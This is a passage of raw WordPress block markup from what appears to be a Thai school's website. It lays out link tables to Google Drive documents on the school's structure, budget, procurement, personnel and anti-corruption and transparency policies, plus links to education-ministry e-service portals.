wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery 